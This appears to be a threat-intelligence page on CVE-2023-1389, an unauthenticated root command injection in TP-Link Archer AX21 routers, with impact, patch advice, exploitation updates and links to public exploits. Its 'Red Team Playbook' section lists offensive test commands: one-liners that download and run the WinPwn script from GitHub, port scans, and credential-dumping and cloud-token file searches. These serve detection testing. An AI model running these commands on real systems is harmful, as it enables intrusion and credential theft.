CVE-2023-1389
Overview
This vulnerability is a command injection flaw caused by improper input sanitization of the country parameter in the write operation of the /cgi-bin/luci;stok=/locale endpoint on the TP-Link Archer AX21 (AX1800) web management interface. The parameter is passed unsanitized to the popen() function, enabling execution of arbitrary shell commands. The affected component is the firmware's web-based locale configuration handler prior to version 1.1.4 Build 20230219.
Vulnerability Description
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to execute arbitrary commands as the root user on the device. This grants full control over the router, allowing compromise of network traffic, device configuration, and potentially lateral movement within the connected network. No authentication or user interaction is required, enabling complete device takeover and disruption of network operations.
Solution
Upgrade the TP-Link Archer AX21 (AX1800) firmware to version 1.1.4 Build 20230219 or later, as released by TP-Link. Detailed patch instructions and advisories are available at the vendor’s official security advisory page and at https://www.tenable.com/security/research/tra-2023-11. Applying this update mitigates the command injection vulnerability by properly sanitizing input to the locale endpoint.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in the firmware of the TP-Link Archer AX21 router represents a significant security flaw that arises from inadequate input validation in the web management interface. Specifically, the issue lies within the handling of the country parameter in the /cgi-bin/luci;stok=/locale endpoint. The firmware fails to properly sanitize user input before passing it to the popen() function, which executes commands in the operating system's shell. This oversight allows an unauthenticated attacker to craft a malicious POST request that injects arbitrary commands, which are executed with root privileges. The implications of this vulnerability are severe, as it can lead to complete system compromise.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage a simple POST request to the vulnerable endpoint, manipulating the country parameter to execute arbitrary commands on the device. This could be done remotely, without any authentication, making it particularly dangerous. For instance, an attacker could gain access to sensitive information stored on the device, modify configurations, or even use the compromised router as a pivot point to launch further attacks within the network. The ease of exploitation, combined with the lack of authentication requirements, significantly increases the risk of successful attacks.
The real-world impact of this vulnerability extends beyond the immediate compromise of the affected device. For businesses relying on the TP-Link Archer AX21 for network connectivity, the exploitation of this flaw could lead to unauthorized access to sensitive data, disruption of services, and potential legal ramifications due to data breaches. Moreover, compromised routers can be used as part of a botnet, contributing to larger-scale attacks such as Distributed Denial of Service (DDoS) attacks. The reputational damage associated with such incidents can also have long-lasting effects on customer trust and brand integrity.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring tools can be employed to detect unusual traffic patterns or unauthorized access attempts to the web management interface. Additionally, implementing strict access controls and ensuring that only authenticated users can access sensitive management interfaces can significantly reduce the attack surface. Employing intrusion detection systems (IDS) can also help identify and alert administrators to potential exploitation attempts.
In conclusion, the command injection vulnerability in the TP-Link Archer AX21 firmware highlights the critical need for robust input validation and secure coding practices in network device firmware. The potential for exploitation poses significant risks to both individual users and organizations, emphasizing the importance of proactive security measures. By staying informed about vulnerabilities, applying timely updates, and employing comprehensive security strategies, organizations can better protect themselves against the threats posed by such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2023-1389 vulnerability in TP-Link Archer AX21 devices. This increase in activity coincides with the emergence of new proof-of-concept exploits publicly available on GitHub and Exploit-DB, which lowers the barrier for adversaries to weaponize this command injection flaw. Although the EPSS score has only marginally increased, the sharp rise in detection frequency signals growing attacker interest and potential for opportunistic exploitation. For defenders, this trend underscores an elevated risk environment where unauthenticated remote code execution vulnerabilities in widely deployed consumer routers are actively targeted. Consequently, the threat level associated with this vulnerability should be considered heightened, reflecting both the expanding exploit toolkit and the intensifying exploitation attempts observed by our telemetry.
Update 2 — May 23, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the TP-Link Archer AX21 command injection vulnerability, accompanied by the emergence of additional publicly available proof-of-concept exploits. While the EPSS score remains stable with only a marginal decline, the uptick in detection frequency signals sustained attacker interest and expanding exploitation capabilities. This development is significant because it indicates that threat actors are actively refining and disseminating tools to leverage this unauthenticated remote code execution flaw, thereby increasing the likelihood of opportunistic compromise in affected environments. Consequently, the threat level associated with CVE-2023-1389 should be viewed as elevated, reflecting a dynamic exploit landscape where attackers continue to probe and weaponize this vulnerability despite the absence of confirmed ransomware linkage.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tp-Link | Archer Ax21 Firmware | All |
cpe:2.3:o:tp-link:archer_ax21_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| TP-Link Archer AX21 - Unauthenticated Command Injection | Voyag3r | remote | hardware | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Voyag3r-Security/CVE-2023-1389
|
Voyag3r-Security | 17 | 7 | 2023-07-28 | View |
|
werwolfz/CVE-2023-1389
TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]
|
werwolfz | 1 | 2 | 2023-12-25 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-1389 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2023-11 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/174131/TP-Link-Archer-AX21-Command-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1389 |